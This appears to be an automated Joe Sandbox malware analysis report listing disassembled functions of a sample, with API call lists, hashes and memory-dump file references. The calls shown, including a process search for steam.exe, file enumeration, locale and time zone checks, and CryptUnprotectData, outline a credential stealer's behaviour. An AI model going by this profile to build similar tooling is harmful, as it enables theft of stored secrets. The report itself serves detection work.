                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                              • String ID:
                              • API String ID: 3836391474-0
                              • Opcode ID: e77b89445e32ff7a6daca190d1da5d794e09702cdfe4b6dc2637b4ee46fa0700
                              • Instruction ID: be9a433cb28e579df817371296d546f1ad9e74eb7f96ac25b26d31d16de79f60
                              • Opcode Fuzzy Hash: e77b89445e32ff7a6daca190d1da5d794e09702cdfe4b6dc2637b4ee46fa0700
                              • Instruction Fuzzy Hash: 5001D671501214AFE7305B60DC8CFFB377CEB49B0AF000189FA85E1084EF7999988B60
                              Function 00E54610 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00E54628
                              • Process32First.KERNEL32(00000000,00000128), ref: 00E54638
                              • Process32Next.KERNEL32(00000000,00000128), ref: 00E5464A
                              • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00E54660
                              • Process32Next.KERNEL32(00000000,00000128), ref: 00E54672
                              • CloseHandle.KERNEL32(00000000), ref: 00E5467D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                              • String ID: steam.exe
                              • API String ID: 2284531361-2826358650
                              • Opcode ID: a8e83aeadb8ec9755317ffd6b040680f404001744c07e65794daa759828c8639
                              • Instruction ID: 71d4a439420e9de3faee2958027724afcceee970cb5e27c986056a868fefd6d9
                              • Opcode Fuzzy Hash: a8e83aeadb8ec9755317ffd6b040680f404001744c07e65794daa759828c8639
                              • Instruction Fuzzy Hash: 4E0162716012249FE7309B60AC49FEA77BCEF09759F0401D5FD49E1080EBB9DA988BE5
                              Function 00E44B29 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E44B51
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E44B74
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E44B7F
                              • lstrlen.KERNEL32(00E64CA8), ref: 00E44B8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E44BA7
                              • lstrcat.KERNEL32(00000000,00E64CA8), ref: 00E44BB3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E44BDE
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 00E44BFA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID:
                              • API String ID: 2567437900-0
                              • Opcode ID: 41ed3c9e56316d114edf079b829414330a69bfad4042e57192f696a547abd992
                              • Instruction ID: f004e88f7da8dccdf45e097946d62c1dd3988fb9d6d4680326974b9e446e7cb7
                              • Opcode Fuzzy Hash: 41ed3c9e56316d114edf079b829414330a69bfad4042e57192f696a547abd992
                              • Instruction Fuzzy Hash: E8313C716216159BCB32EF28E889B9E7BE5AF40308F116128FA85B7251CB35DC01CB90
                              Function 011EA987 Relevance: 11.6, Strings: 8, Instructions: 1626COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !Sm$69<$A\72$ST?$nf:s$o_w$23~${m9
                              • API String ID: 0-291933977
                              • Opcode ID: 59c0050e5b6773c35c2a46c843d757407d3c7dd659770ab110e7f686b6c77950
                              • Instruction ID: 5b9bca1fbfc139c8731ca78e5a0eb6c9d18ba942458d5c077d610b5043094f39
                              • Opcode Fuzzy Hash: 59c0050e5b6773c35c2a46c843d757407d3c7dd659770ab110e7f686b6c77950
                              • Instruction Fuzzy Hash: 5AB2E7F360C2009FE304AE2DEC8567ABBE9EF94720F16893DEAC5C7744E63558418697
                              Function 011E909D Relevance: 11.5, Strings: 8, Instructions: 1490COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: &iv$*nzy$=^}m$Bue}$Fzgo$ae]$1rW$wi
                              • API String ID: 0-2135711657
                              • Opcode ID: 5f1e8531145d355feaed8b767a28c83356412da644e5229c7321f7c283f5381e
                              • Instruction ID: 53be90a566f6d5aaa2bc387bee0d5858d076e541f67424f97f2b370273ebe87e
                              • Opcode Fuzzy Hash: 5f1e8531145d355feaed8b767a28c83356412da644e5229c7321f7c283f5381e
                              • Instruction Fuzzy Hash: 8BA218F360C6009FE308AE2DEC8577ABBE5EB94320F168A3DE6C5C7744EA3558058657
                              Function 00E52D60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00E571E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00E571FE
                              • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00E52D9B
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00E52DAD
                              • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00E52DBA
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00E52DEC
                              • LocalFree.KERNEL32(00000000), ref: 00E52FCA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: eee6cd1e3e63c7632f7c77174f4d4217a583707c1cd0934200264fac7320de11
                              • Instruction ID: ce8ae8003b143863fb6d420a58a2bbfa2b4e060f699138fcefda7628be1e176e
                              • Opcode Fuzzy Hash: eee6cd1e3e63c7632f7c77174f4d4217a583707c1cd0934200264fac7320de11
                              • Instruction Fuzzy Hash: 51B11970A00204CFC725CF14D548B99B7F1FB4532AF29D5ADD908AB2A6D7769C86CF90
                              Function 011EC525 Relevance: 9.1, Strings: 6, Instructions: 1621COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 9Xq$[eun$\Tv$_eun$b+z$c[{
                              • API String ID: 0-2570880226
                              • Opcode ID: bda491997c4ce5ad80e9c95fadcdd314dbcdee8aef1e7580211456b94149abda
                              • Instruction ID: 6fb40bada6fe3d4fc2621b3bb7ea89acaf7e264a8b72651a0081844a900df2ef
                              • Opcode Fuzzy Hash: bda491997c4ce5ad80e9c95fadcdd314dbcdee8aef1e7580211456b94149abda
                              • Instruction Fuzzy Hash: 8DB206B3A0C2109FD304AE2DDC8566AFBE9EF94720F16893DEAC4C7344E67598058697
                              Function 011F48ED Relevance: 9.1, Strings: 6, Instructions: 1616COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ',Wg$B)7M$F>K$V{{$tjm$}{
                              • API String ID: 0-3214189499
                              • Opcode ID: eb4581a6edc793e8b974fe750669aeb8376921050782622136cd5ab3d2c3ae26
                              • Instruction ID: 29cb387949cbcd443641a81752479d21cc921d1c9899e2aadad1e39676ddb42c
                              • Opcode Fuzzy Hash: eb4581a6edc793e8b974fe750669aeb8376921050782622136cd5ab3d2c3ae26
                              • Instruction Fuzzy Hash: C8B205F3A0C6049FE3046E2DEC8567ABBE5EFD4320F164A3DE6C4C3744EA3598058692
                              Function 00E52C10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00E52C42
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E52C49
                              • GetTimeZoneInformation.KERNEL32(?), ref: 00E52C58
                              • wsprintfA.USER32 ref: 00E52C83
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID: wwww
                              • API String ID: 3317088062-671953474
                              • Opcode ID: 1de626ae647a813c9bc15eebf70c4ae73369891d0e032bd1843d37ad1676ee40
                              • Instruction ID: fe4f5a2e9458e0bb1fae97a6a7cb3d915557fdca509ed32a1a56369303eb8298
                              • Opcode Fuzzy Hash: 1de626ae647a813c9bc15eebf70c4ae73369891d0e032bd1843d37ad1676ee40
                              • Instruction Fuzzy Hash: 2C014771A00304AFDB288B58DC09B6DB729EB84725F004329FD15DB6C0D77419048BD1
                              Function 011F2DDD Relevance: 7.9, Strings: 5, Instructions: 1604COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 0kG[$4k~g$A7D$Gb/7$\vu
                              • API String ID: 0-1705580044
                              • Opcode ID: 39199022f56fab55b51a5c465536dac2514f1c12743149ec1deea9d276b07e07
                              • Instruction ID: c073dbb52df73d500d56570c81fd2fe1a90f7121da33c0f4138bc5e91fc15f88
                              • Opcode Fuzzy Hash: 39199022f56fab55b51a5c465536dac2514f1c12743149ec1deea9d276b07e07
                              • Instruction Fuzzy Hash: 6CB207F3A0C2049FE3046E2DEC8566AFBE9EF94760F1A453DEAC4C3744EA3558058697
                              Function 00E37750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00E3775E
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E37765
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E3778D
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00E377AD
                              • LocalFree.KERNEL32(?), ref: 00E377B7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
